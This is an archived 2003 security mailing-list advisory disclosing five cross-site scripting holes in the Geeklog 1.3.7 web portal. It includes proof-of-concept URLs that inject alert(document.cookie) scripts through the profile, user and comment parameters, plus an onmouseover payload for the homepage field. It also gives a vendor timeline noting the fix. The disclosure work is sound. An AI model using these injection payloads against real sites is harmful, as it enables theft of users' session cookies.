Multiple XSS in Geeklog 1.3.7

From: snooq (jinyeanat_private)
Date: Mon Jan 13 2003 - 18:43:01 PST

Next message: Frog Man: "phpPass (PHP)"

Previous message: securityat_private: "Security Update: [CSSA-2003-002.0] Linux: Webmin Cross-site Scripting and Session ID Spoofing Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) nothing new. typical XSS bugs. summary ======= Geeklog is a web portal system written in PHP. There exists 5 XSS holes in the software. the 'holes' =========== --1-- http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script> --2-- http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script> --3-- http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> --4-- http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> --5-- 'homepage' field in the user's account information page is not sanitised properly. As a result, javascript can be injected by setting the 'homepage' field like this: http://url" onmouseover="alert(document.cookie) ** 3) & 4) were found by Dirk Haun of Geeklog Team. vendor status ============= 03/01/2003 contacted Dirk Haun of Geeklog team 14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found. --==snooq==--

Next message: Frog Man: "phpPass (PHP)"
Previous message: securityat_private: "Security Update: [CSSA-2003-002.0] Linux: Webmin Cross-site Scripting and Session ID Spoofing Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jan 19 2003 - 21:24:03 PST